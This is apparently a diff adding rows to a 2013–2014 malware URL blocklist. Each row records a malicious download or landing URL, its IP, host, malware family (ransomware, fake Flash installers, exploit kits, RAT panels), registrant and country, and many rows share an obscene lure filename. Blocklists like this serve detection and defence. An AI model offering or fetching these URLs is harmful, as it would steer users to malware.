+"2013/09/12_05:48","tube8vidsrom.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidssan.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidssjw.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidssyg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidstrh.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidstyp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsuty.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsvaj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsvcs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvmr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberfe.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberjj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberme.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberue.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubesrs.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubesrw.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubesun.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubetmf.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubetmg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubetns.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubetts.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeubp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeujh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeull.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeuvd.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubevdn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubevih.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubevjk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewfl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewiq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewis.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubewmt.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexei.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubexiv.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexvq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubexwb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubexxq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeyge.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeyhz.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeyza.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsbbr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsbhy.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsbzx.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidscjk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubehdn.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubehli.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeidv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeijc.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeiqb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubejie.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubejlp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejpe.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejvh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubejyk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekad.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekgj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekgv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeklg.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubekpn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubekrn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelap.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelat.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelfr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubelzv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubemue.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeneg.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeneu.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubengt.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubenqp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubentf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeocr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeonf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeopy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeoxo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeoxy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeppj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqfo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqsh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqve.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubeqwr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtuberau.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberea.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtuberep.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","generalchemicalsupply.com/gLG.exe","174.132.149.189","bd.95.84ae.static.theplanet.com.","Trojan.Agent.rfz","A-Ware Marketing / webservices@awaremarketing.net","21844","0","--", +"2013/09/12_05:48","slimxxxtubeacn.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubealn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeanr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeaxy.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeayv.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubebej.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubebgp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubebmq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubebnd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubecgl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubectk.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubecty.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeczp.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedgv.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubedjm.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedlb.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedvj.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubedxc.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubedya.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeejs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeemz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubefdr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubefel.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubeftb.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","slimxxxtubefzc.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","slimxxxtubehan.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidszyj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/23_04:50","cofeb13east.com/download.php?ln5/cA==","50.97.234.2","-","Win32/InstallMonetizer","-","36351","0","US", +"2013/10/21_21:43","morenews3.net/got.php?l=dWlkP_IxMjg4NDU1ODImaWQ9NDAxO_AmdGlkP_QwNDM3Ni","37.220.26.172","-","Drive-by","contact@privacyprotect.org","35662","0","GB", +"2013/10/21_21:48","gredinatib.org/got.php?l=dWlkPTgyODM3MTI1NiZpZD01MDIyNiZ0aWQ9Mjc2NDE4JnBjPW","37.220.26.131","-","Drive-by","contact@privacyprotect.org","35662","0","GB", +"2013/10/27_02:56","-","178.150.192.50/traff01.exe","-","Trojan","-","13188","0","UA", +"2013/10/27_02:56","-","178.150.192.50/upeksvr.exe","-","Trojan","-","13188","0","UA", +"2013/10/27_02:56","-","178.150.202.131/same7b1.exe","-","Trojan","-","13188","0","UA", +"2013/10/27_02:59","-","94.228.222.47/index.html?p=6175","-","Trojan","-","47869","0","NL", +"2013/10/27_03:02","tecslide.com/js/down/Sbin1/MS0ftAdapter.exe","80.241.217.134","-","Trojan","Domain Admin (contact@privacyprotect.org","51167","0","DE", +"2013/10/27_03:02","www.slivki.com.ua/as/Ponynl.exe","212.26.135.68","-","Trojan","=========== / hostmaster-telecom@adamant.net","8788","0","UA", +"2013/10/27_03:02","www.slivki.com.ua/as/smp.exe","212.26.135.68","-","Trojan","=========== / hostmaster-telecom@adamant.net","8788","0","UA", +"2013/10/27_03:06","bizzibeans.net/wp-admin/zope/","82.165.116.169","-","Leads to trojan","Registrant toddlewis@talktalk.net","8560","0","DE", +"2013/10/27_03:06","bizzibeans.net/wp-admin/zope/adobe_flash.exe","82.165.116.169","-","Trojan","Registrant toddlewis@talktalk.net","8560","0","DE", +"2014/03/31_11:44","-","185.12.14.208/adm/documentos.zip","-","Trojan.Banker","-","50673","0","NL", +"2014/03/21_09:24","www.two-of-us.at/images/4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe?dl=1","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/2.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_13:13","kids-fashion.dk/browser.php?copy=9763&common-prop=0&edit=0","94.231.107.252","linux20.unoeuro.com.","exploit kit","-","48854","0","DK", +"2014/04/27_12:36","-","94.242.225.240/download/34/VUBSXlcUUk9ITQQQbyctMScgNWkuKDk/YSAnPX4jJ3wzMCIIMio1NWMuKj1dUEQHDQFbUF9bXVxZXVlXVhcbHxEqHxNFDR21Og/anzhelika_varum_-_lyalyafa_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/03/11_22:39","directxex.com/uploads/1406101817.Server.exe","108.162.199.96","-","MSIL/Bladabindi.F trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/youtube/d/flashplayer.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1144786436.be.exe","108.162.199.96","-","Gen:Variant.Symmi.35186","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/3.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1010343014.server12345.exe","108.162.198.96","-","Win32/Injector.AYMT trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/777.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/01/22_22:22","downloads-whatsapp.com","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2014/01/22_22:22","downloads-whatsapp.com/whatsapp-for-nokia.php","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2014/04/27_12:36","-","94.242.225.240/download/05/ZHNjYWYnY3h5fjU/PnR8ZnZzZDZ/e2hoMHN2Ug9QVgtCQ1N3Q1lEQhJdW1IMAxVQXFIKDw4IDAUNCgl2ZyQqKCAZLix0DR3GIA/voskresenie_-_muzykant_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=10","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/04/27_12:36","-","94.242.225.240/download/ab/ytnJx8Cd2cbHxIZmN7WyNjZzpDZobK27qmstOm6vOWsqbmRpaOvOynobTq6fsrjg6ejS1tPa0NLUwY6Aho6zhIrSDR12BA/serebro_-_skazhi_ne_molchi_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/03/21_09:24","www.two-of-us.at/images/au.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/youtube/d/flashplayer.html","85.158.181.11","server143-han.de-nserver.de.","Mal.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/11_22:39","directxex.com/uploads/1021119574.C-Chrome.exe","108.162.199.96","-","Win32/Injector.AYKD trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1010343014.server12345.exe","108.162.199.96","-","Generic Malware","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/21_11:24","doktester.orgfree.com/styles/jrtXnMPq.php?html=27","144.76.99.221","users.orgfree.hosting.free.","leads to fake flashplayer installer at OneDrive","Registrant support@freewha.com","24940","0","DE", +"2013/10/31_18:23","www.blueimagen.com/Attachment/Invoice-List2013-10-20-Copy.jar","65.99.225.72","server79.neubox.net.","Trojan.AdWind","Tools Ideas Enter (staff@toolsideascreativas.com)","36024","0","US", +"2013/11/19_15:22","silurian.cn/modules/mod_cmsfix/fix.php","159.226.74.251","-","iframe leads to exploit kit","Registrant Contact fanjunxuan@gmail.com / Registrant Contact fanjunxuan@gmail.com","7497","0","CN", +"2014/03/11_22:39","mylondon.hc0.me/Panel/","5.135.127.68","-","Solar EK","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/12/03_08:36","www.lostartofbeingadame.com/wp-content/plugins/www.fotosupload.php","70.88.182.38","-","redirects to trojan download","-","7725","0","US", +"2013/12/03_08:36","bride1.com/File/www.fotosupload.com/fotosuploadcominfidelidadfotos2dediciembreparaquenoquedendudasc.zip","216.151.221.238","-","trojan inside zip file","-","13768","0","US", +"2014/03/11_22:39","somethingnice.hc0.me/login.php","5.135.127.68","-","PlasmaRAT ACP","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/YACMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/12/09_09:45","europol.europe.eu.id214218540-7444056787.h5841.com/?flow_id=2000&870470=33440/case_id=17188","193.169.87.247","-","Leads to ransomware","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", 